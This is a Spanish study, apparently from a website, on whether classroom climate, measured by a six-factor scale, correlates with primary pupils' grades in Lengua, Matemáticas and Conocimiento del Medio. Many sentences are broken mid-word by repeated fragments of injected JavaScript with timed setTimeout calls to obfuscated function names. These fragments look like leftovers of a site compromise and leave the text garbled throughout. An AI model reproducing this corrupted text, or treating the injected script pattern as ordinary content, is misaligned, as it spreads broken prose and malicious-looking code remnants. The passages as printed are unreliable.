EL CLIMA DEL AULA COMO FACTOR INFLUYENTE EN EL RENDIMIENTO ACADÉMICO

Autor: Francisco José Gata Bejarano

Muchas investigaciones han estudiado los factores que pueden verse implicados en el proceso de enseñanza-aprendizaje. Entre estos factores se encuentra uno que engloba muchos agentes y muchos otros factores implicados en el rendimiento escolar de los dicentes, hablamos del clima en el aula.

Este estudio trata de analizar si existe una correlación significativa directa entre diferentes factores que configuran el clima en el aula mediante la Escala del clima de convivencia y el rendimiento académico, a través de variables de notas medias en el segundo trimestre, nota de los sujetos en matemáticas, lengua y conocimiento del medio.

 

1.     Objetivos generales e hipótesis de investigación

 

 Muchos investigadores han estudiado como el clima del aula es una de las variables que intervienen en el aprendizaje, potenciandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el gusto por el mismo con un clima del aula positivo, siendo, en cambio, una barrera cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se configura un clima del aula cerrado, autoritario, negativo.

El objetivo que nos plantemos en el presente estudio es saber si en los centros públicos de Extremadura existe correlación entre el clima del aula y el rendimiento académico de los alumnos. Para ello partimos de la siguiente hipótesis de trabajo:

-Existe una correlación  significativa directa entre los factores de la escala del clima del aula y el rendimiento académico medio de             la clase.

Metodología.

2.     Participantes

Hemos trabajado con los alumnos del tercer ciclo de un colegio de titularidad pública del sur de la capital pacense. Con un total de 106 alumnos en el ciclo, hemos recogido la cantidad de 94 muestras. En relación al género, hemos encuestado a un total de 54 chicos y 40 chicas.

3.     Instrumentos

            El instrumento que hemos utilizado ha sido la Escala de clima de convivencia en el aula elaborada por Mª Isabel Polo del Río, Benito León del Barco y Margarita Gozalo Delgado (2013).

            La Escala de clima de convivencia en el aula consta de 43 ítems y se presenta en formato Likert con cinco intervalos en forma numérica del 1 al 5, que representan un continuo que va desde “Nada” hasta “Mucho”. Fue elaborada para medir el clima de convivencia entre compañeros y con el profesor en el aula.

Tal y como describen M.I. Polo, B. León y M. Gozalo (2013), el primer factor, correspondiente a la “actitud del docente”, se refiere a actitudes del docente hacia el alumnado dentro del aula, como escuchar, ayudar, valorar e interesarse por el alumnado, animarle a la participación, así como tener en cuenta sus sugerencias y propuestas, actuar correctamente ante los problemas, animarles a participar facilitar el trabajo en grupo, y esforzarse por utilizar recursos variados para impartir las clases.

          El segundo factor es la implicación del alumnado referido a actitudes del tipo: dar importancia al estudio, al esfuerzo y a la realización de las tareas escolares para la obtención de un buen resultado académico, conocer y entender las normas, así como valorar al maestro como alguien preocupado por el alumnado.

          El tercer factor, “relaciones positivas en el aula”, hace referencia a actitudes grupales como estar a gusto, trabajar en grupo, llevarse bien con los demás compañeros, generar  clima de respeto y ayuda mutua.

            El factor cuarto, “establecimiento y organización de normas”, se refiere a la existencia de normas en el aula, la participación en la creación  de esas normas, revisión de las mismas y el respeto hacia ellas, asi como forma de aumentar el conocimiento entre compañeros.

             El quinto factor, “control y calidad de las normas”, alude a la actitud del alumno que entiende y conoce que el incumplimiento de las normas tiene unas consecuencias, así como que el maestro esté atento al respeto y cumplimiento de las mismas.

             El sexto factor, “organización de las tareas”, hace mención tanto al orden en el desarrollo de la clase, como al orden de las tareas en clase para que resulten interesantes y divertidas para el alumno, a la vez que generen esfuerzos e intereses por ellas.

4.     Procedimiento

Teniendo en cuenta la hipótesis con la que trabajaba, seleccioné la Escala de clima de convivencia en el aula.

Me puse en contacto con el director del colegio público donde iba a pasar los cuestionarios, explicándole en qué consistía mi trabajo y para qué necesitaba la colaboración del centro. No puso ningún impedimento y reunió a los cinco tutores de los grupos del tercer ciclo donde se elaboró la encuesta debido a que ciclos inferiores no iban a entender algunos de los ítems del cuestionario.

Llegado el día para la realización de los cuestionarios fuimos aula por aula explicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que el cuestionario era personal, cada uno debía poner lo que pensara sin dejarse influenciar por los demás y que no había respuestas buenas ni malas, que debían responder cómo ellos pensaban. Les expliqué que era para un trabajo de la Universidad, que disponían de media hora indicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que no lo hicieran deprisa y que contestaran con total libertad según sus opiniones. Les facilité el cuestionario y puse un ejemplo con un ítem que no aparecía en el cuestionario para no condicionar la respuesta, con el fin de aclarar cómo lo debían rellenar.

Para efectuar de manera correcta el análisis de los datos, expliqué que debían poner sus nombres y apellidos en el inicio de la escala pero que se mantendría el anonimato de la autoría, que solo serviría para hacer coincidir las notas medias con el número de la escala que cada alumno tenía.

5.     Resultados

5.1.           Correlación de Pearson de los factores con la variable de la media del segundo trimestre

            En la tabla 1 presentamos los resultados de la prueba de correlación de Pearson entre los factores de las notas medias obtenidas por los sujetos en la segunda evaluación y los seis factores que evalúan la actitud docente, la implicación del alumnado, las relaciones en el aula, el establecimiento y organización de normas, el control y calidad de las normas y la organización de las tareas.


 

  Factor 1: Actitud Docente Factor 2: Implicación del alumnado Factor 3: Relaciones Positivas en el aula Factor 4: Establecimiento y organización de normas Factor 5: Control y calidad de las normas Factor 6: Organización de las tareas
  Nota Media 2º Trimestre Pearson

,305**

,422**

,216*

-,126

,287**

,231*

Sig.

,004

,000

,038

,238

,006

,027

**.La correlación es significativa al nivel 0,01 (bilateral) Tabla 1: Correlaciones significativas directa entre la variable de la nota media del segundo trimestre y los factores.

Como podemos comprobar, con una de las variables analizadas más importantes, ya que engloba las notas de todas las materias impartidas durante el segundo trimestre escolar, todos los factores, exceptuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando uno de ellos, muestran una correlación significativa.

El factor relacionado con la implicación del alumnado en el aula es el que mayor correlación tiene con la variable relacionada con la nota media del segundo trimestre, seguida por el factor uno que nos habla de la actitud docente. El tercer factor con correlaciones significativas es el que analiza el control y la calidad de las normas, seguido por el factor de organización de las tareas y por último, con un valor inferior, las relaciones positivas en el aula.

Con el factor que no encontramos correlaciones es con el relacionado con el establecimiento y organización de las normas. Como podemos observar en la tabla 1, aunque no encontremos correlación significativa con el establecimiento y organización de las normas, sí que encontramos correlación con el control y calidad de las mismas.

Por lo tanto, en general, los alumnos y alumnas sienten que en el aula existen normas para la convivencia e, incluso, se revisan entre todos si se cumplen las normas, pero obtenemos resultados negativos en el control y calidad de las normas, donde los alumnos y alumnas encuestados consideran que si una norma se incumple no se aplican las consecuencias, el maestro no está atento a que las normas se respeten y conocimiento de las consecuencias de no cumplir las normas no están claras.

5.2.           Correlación de Pearson de los factores con las notas de Lengua, Matemáticas y Conocimiento del Medio.

 

Si analizamos la variable de las calificaciones de los sujetos en la asignatura de Lengua, con los diferentes factores, nos encontramos con correlaciones significativas en los factores relacionados con la implicación del alumnado, la actitud docente y con el factor sobre el control y calidad de las normas.

  Factor 1: Actitud Docente Factor 2: Implicación del alumnado Factor 3: Relaciones Positivas en el aula Factor 4: Establecimiento y organización de normas Factor 5: Control y calidad de las normas Factor 6: Organización de las tareas
          Nota Lengua Pearson

,254*

,399**

,160

-,082

,208*

,118

Sig.

,018

,000

,125

,445

,050

,264

**.La correlación es significativa al nivel 0,01 (bilateral)

Con esta variable, los factores relacionados con la organización de las tareas y con las relaciones positivas en el aula pierden peso, y dejan de tener correlación, en comparación con la variable que mide la nota media del segundo trimestre.

En cuanto a los valores obtenidos en la variable de la nota de matemáticas, apreciamos (tabla 3) que todos los factores pierden peso, obteniendo solamente en el factor relacionado con la implicación del alumnado una correlación significativa.

Este resultado puede ser consecuencia a que la materia es más científica e individualista por lo que la organización de tareas, las normas del aula o la actitud docente no tienen el mismo valor que en otras materias.

  Factor 1: Actitud Docente Factor 2: Implicación del alumnado Factor 3: Relaciones Positivas en el aula Factor 4: Establecimiento y organización de normas Factor 5: Control y calidad de las normas Factor 6: Organización de las tareas
Nota de Matemáticas Pearson

,123

,274**

,161

-,106

,197

,105

Sig.

,255

,008

,122

,320

,064

,320

**.La correlación es significativa al nivel 0,01 (bilateral)

A pesar de esto, el factor relacionado con la implicación del alumnado pasa de tener un valor de ,422 en la variable sobre la nota media del segundo trimestre y un valor de ,399 en la variable de la nota de lengua a un valor ,274 en matemáticas, siendo un resultado con una caída considerable.

En la variable con la nota media de conocimiento del medio es donde mayor número de factores con correlación significativa encontramos de las tres materias analizadas.

Seguimos obteniendo como más representativo el valor del factor 2, relacionado con la implicación del alumnado, seguido del factor sobre la actitud docente y, aunque con valores moderadamente más bajos, encontramos los factores que miden el control y la calidad de las normas y el factor sobre las relaciones positivas en el aula.

Los factores donde no encontramos correlación son los relacionados con  la organización de las tareas y el establecimiento y organización de las normas.

  Factor 1: Actitud Docente Factor 2: Implicación del alumnado Factor 3: Relaciones Positivas en el aula Factor 4: Establecimiento y organización de normas Factor 5: Control y calidad de las normas Factor 6: Organización de las tareas
Nota Conocimiento Pearson

,328**

,429**

,249*

-,103

,263*

,157

Sig.

,002

,000

,016

,333

,013

,137tes

**.La correlación es significativa al nivel 0,01 (bilateral) Tabla 4: Correlaciones significativas directas entre la variable de la nota de conocimiento del medio y los factores.

Esta materia, al necesitar trabajos cooperativos y aprendizajes donde se necesita la implicación del alumnado, también se hace necesario el control y la calidad de las normas y las relaciones positivas entre alumnos.

6.     Discusión de resultados

Respecto a los resultados de nuestro trabajo, podemos concluir que existe relación entre el clima del aula y el rendimiento académico.

En la fundamentación teórica de este trabajo, hemos recogido cómo el clima del aula no depende de un solo agente, sino que es el resultado de la implicación de varios, entre los que encontramos el docente, el alumnado, el aula o la familia. Si alguno de los esos agentes no intervienen en la configuración de un clima del aula positivo, la percepción del propio agente va a ser negativa.

Tal y como hemos evaluado en el apartado anterior, obtenemos una correlación significativa directa entre los resultados académicos y la implicación del alumno en el desarrollo del aula, siendo el único factor que obtiene una correlación significativa con todas las variables analizadas. Tenemos que tener muy presente este valor, porque es importante que los alumnos y alumnas se impliquen en su propio aprendizaje. Este factor ha sido el que mayor correlación significativa directa ha obtenido en todas las variables que hemos analizado, es decir, la percepción del alumnado del tercer ciclo del colegio donde hemos pasado la escala sobre su participación en el aprendizaje es bastante baja, para estos alumnos y alumnas no es importante estudiar y realizar las actividades que se les mandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda, incluso no perciben que para sacar buenas notas se necesite hacer un esfuerzo.

Otra de las percepciones que los alumnos y alumnas tienen es que el maestro no valora el esfuerzo y trabajo de los alumnos. Concuerda con la percepción del alumnado en relación a la no valoración de la importancia de terminar las tareas a tiempo.

Es curioso que, sobre todo en las materias donde más se necesita la implicación del alumno, sea donde mayor nivel de correlación significativa directa obtengamos. Es el caso de la variable de la nota de conocimiento del medio, donde este factor obtiene el nivel mayor. Es una materia científica que requiere tanto el esfuerzo como la implicación del alumnado en el propio proceso de enseñanza-aprendizaje. En general, con la variable de la nota media del tercer ciclo obtenemos valores parecidos, indicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que es un factor muy importante que debemos trabajar si queremos mejorar el rendimiento académico.

Obtenemos también en este factor una referencia a las normas en el aula, donde obtenemos que el alumnado no conoce ni entiende por completo las normas.

Y en relación a las normas, tanto en su control como en la calidad de las mismas, hace referencia el factor 5 que ocupa el tercer valor en todas las variables, excepto en la nota de matemáticas, en la correlación significativa de nuestra investigación. Los alumnos y alumnas perciben en el control del cumplimiento de las normas en clase que, a pesar de incumplirlas, no se aplican unas consecuencias.

En la dimensión de cultura que propone Tagiuri (1968), señala una serie de variables relacionadas con la aplicación de normas, cuyos estudios demuestran una relación consistente entre todas las variables y los productos educativos. Entre esas variables, en relación a las normas, encontramos la claridad de metas y objetivos en el aula, más allá de indicaciones directas sobre cómo debemos comportarnos en clase, la aplicación de normas llega a plantearnos una serie de metas que los alumnos deben conseguir para la creación de un clima positivo en el aula. Otra de las variables que vienen en relación con la anterior es la aplicación consistente de metas y castigos (entendido como consecuencias al incumplimiento de las normas). No solo debemos plantear una serie de normas, sino velar por su cumplimiento y, por supuesto, llevar a cabo las consecuencias del incumplimiento de las mismas. Y por último Tagiuri nos plantea otra variable importante: el consenso entre profesores y dirección sobre disciplina. Se debe trabajar con toda la comunidad educativa tanto para la formulación de las normas como de las consecuencias de no cumplirlas.

Con todo ello, debemos trabajar en el aula varios aspectos que mejoren esa percepción del alumnado de que no se cumplen ni las normas ni sus consecuencias. En primer lugar habría que trabajar para que el establecimiento de las normas sea compartido entre profesor y alumnos, que se sientan parte del proceso, que esa formulación sea también de los propios alumnos y alumnas. Ese planteamiento común de las normas también debemos hacerlo a la hora de plantear las consecuencias de no cumplirlas, hay que plantear a cada norma su respectiva consecuencia si no se cumple, y en ese establecimiento de consecuencias deben tomar partido también el alumnado. El docente en este nuevo modelo de creación de normas y consecuencias debe actuar más como guía que como impositor, el objetivo principal es conseguir que los alumnos sientan que esas normas han sido elaboradas por ellos y no impuestas por el profesor por tener un rol superior a ellos. De este modo la figura del docente es guiar a los dicentes a un objetivo en el planteamiento de esas normas y que éstas contribuyan claramente a crear un clima en el aula más positivo.

El segundo factor que obtenemos en todas las variables excepto en matemáticas, es la actitud docente. Al igual que ocurre con el alumnado, los docentes son eje central de la configuración de un clima positivo en el aula, por ello es importante tener en cuenta este factor.

La percepción del alumnado en referencia a la actitud docente es baja, no perciben que se interese por ellos ni que los escuchen, no explica las tareas a realizar con claridad, no tiene en cuenta las sugerencias de los alumnos y alumnas…

Además los alumnos perciben que el maestro no anima a la participación de todos ni valora que sean originales. Estas percepciones, como conclusión de los valores obtenidos sobre todo en conocimiento del medio, perjudican la relación alumnos-profesor, lo que repercutiría también en el clima del aula.

El factor tercero referido a las relaciones positivas del aula ocupa la última posición, y, aunque no obtengamos correlaciones significativas en lengua y matemáticas, se hace notable en conocimiento del medio, ya que es una asignatura donde se propicia el trabajo en grupo, el aprendizaje cooperativo…, así como en la media de las calificaciones del segundo trimestre donde ocupa el valor cuarto.

No podemos obviar que la escuela es uno de los lugares donde los niños y niñas encuentran un espacio de socialización, tal y como hemos recogido en la fundamentación teórica, por ello este factor cobra principal importancia en nuestro trabajo, sobre todo por ser uno de los factores más influyentes en la configuración del clima por parte del alumnado, ya que el establecer relaciones positivas con los compañeros ayudará tanto a aspectos relacionados con la socialización como aquellos relacionados con el rendimiento académico.

Con los resultados obtenidos, somos conscientes de la carencia en las relaciones que se dan en el aula entre compañeros de manera global y en concreto en materias que suponen una mayor implicación del alumnado en tareas cooperativas.. En este factor se barajan varios ítems que demuestra que entre compañeros se producen situaciones de riñas, peleas e insultos, los sujetos encuestados perciben que algunos compañeros no se llevan bien entre ellos o que no se dan situaciones de respeto y ayuda entre los miembros del grupo.

Como agentes activos en la configuración del clima del aula, debemos tener en cuenta varias cuestiones como docentes. En primer lugar potenciar momentos propicios para que los alumnos y alumnas puedan trabajar unos con otros y puedan ir conociéndose, así como proponer diferentes actividades que suponga la colaboración de todo el grupo para hacerles ver la importancia de trabajar cooperativamente.

Existen variables dentro de la dimensión de sistema social propuesta por Tagiuri (1968) que parecen ser relevantes para el rendimiento académico. Entre estas variables se encuentran las relaciones que se dan entre los distintos miembros de la comunidad educativa (a nosotros nos interesa, sobre todo, las relaciones alumnos-profesor y alumnos-alumnos) o la interacción en actividades académicas entre estudiantes. Por ello debemos tener en cuenta el resultado obtenido en el factor de las relaciones positivas en el aula, ya que este factor ocupa la tercera posición en términos de correlación en todas las materas analizadas.

Además cobra mayor importancia esta cuestión, porque la realización de este tipo de actividades o la potenciación de las relaciones en el aula, depende más de los docentes que de los propios alumnos y alumnas del aula.

Del mismo modo en la dimensión de cultura, Tagiuri nos indica que el profesor debe poner énfasis del trabajo en equipo así como tener capacidad de innovación y cambio, para mejorar el clima en el aula.

El factor con un valor más débil en la correlación significativa es el factor relacionado con la organización de las tareas. Se debe trabajar para darle mayor interés a las actividades que se mandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andan en clase para consolidar los conocimientos impartidos en el aula, ya que el alumnado no siente interés por ellas. En este sentido se puede trabajar en dos sentidos: en primer lugar no ceñirse a actividades propuestas por las editoriales en los libros, ya que pueden resultar más aburridas para el alumno, e intentar realizar actividades atractivas. Por otro lado el alumno debe comprobar en la realización de esas actividades el significado que tiene para su propio aprendizaje para poder darle sentido al porqué tienen que realizar esas actividades, trabajar para que en lugar de que los alumnos vean la realización de actividades o deberes como una simple obligación por ser estudiantes, las realicen sabiendo que tiene una utilidad.

7.     Conclusiones

Después del análisis de los resultados obtenidos en la escala y su posterior discusión en los apartados anteriores, debemos concluir la veracidad de la hipótesis planteada. Ha quedado reflejada en nuestro estudio la existencia de una relación entre los distintos factores sobre el clima en el aula y el rendimiento académico. Así hemos podido comprobar como existía una correlación significativa directa entre cuatro de los seis factores analizados en la escala en los sujetos encuestados, demostrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la existencia de la relación entre clima en la clase y rendimiento escolar.

Como hemos ido argumentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a lo largo del presente estudio, no solo corresponde a los docentes la configuración del clima de la clase, y tal y como hemos podido comprobar en los resultados de la investigación, la implicación del alumnado dentro del desarrollo del aula y en su proceso de enseñanza-aprendizaje es un factor a trabajar si pretendemos llevar a cabo un clima positivo, abierto, democrático en la clase.

Al mismo tiempo, no debemos obviar la importancia de crear unas normas para el buen desarrollo de la clase, y su control y calidad de las mismas. La creación de normas en el aula debe ser consensuada con el alumnado, intentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que la percepción de las mismas no sea negativa, impuesto por el docente por su posición dentro del aula, sino como algo elaborado en común. Esa visión del trabajo en las normas nos permitirá que el alumnado se involucre en el cumplimiento de las mismas. Del mismo modo, el incumplimiento de las normas creadas por toda la clase, debe tener unas consecuencias claras que deben salir también del consenso entre alumnos y entre alumnos y maestro/a, y se debe aplicar siempre que se incumpla una de las normas.

Todos estos factores que debemos tener en cuenta y trabajar con ellos, forman parte de un conjunto mayor que configuran el clima en el aula y que la falta de algunos de ellos puede provocar que el clima en el aula sea negativo lo que influirá, como variable que influye en el aprendizaje, en el rendimiento escolar de nuestros alumnos y alumnas.

Este estudio posee una gran importancia para los docentes que pretenden conseguir de sus alumnos un buen rendimiento académico completo, no solo en términos de calificaciones sino también en todos los aspectos trasversales que se tocan en el aula de primaria. Como hemos sostenido a lo largo del presente estudio, la creación de un clima abierto, democrático, participativo, en general un clima en el aula positivo, nos propicia una serie de ventajas frente a un clima cerrado, autoritario y negativo, ya que además de mejorar el rendimiento académico, se propicia la aparición de buenas relaciones entre compañeros, la posibilidad de trabajos cooperativos, trabajar la inteligencia emocional, se abre caminos para procesos de sociabilidad, y el docente debe preocuparse por la configuración de un clima beneficioso para los dicentes y encargarse, como guía, de involucrar a todos los agentes en esa configuración del clima en el aula.

Y es que la educación primaria no debe tratar a estudiantes mirandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando exclusivamente su componente cognitivo, sino a pequeñas personas que necesitan, además de conocimiento para desenvolverse en su día a día, instrucciones claras y precisas para que esos conocimientos no sean meros apuntes para memorizar, sino una llave para abrir nuevos caminos en su día a día. Por ello el docente no solo sirve de instructor de esos conocimientos, sino como guía para hacer del alumno o alumna que entra por su puerta, un ser único y especial allá por donde pisa, pues lo que se aprenda en la escuela, les acompañará el resto de su vida.

 

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.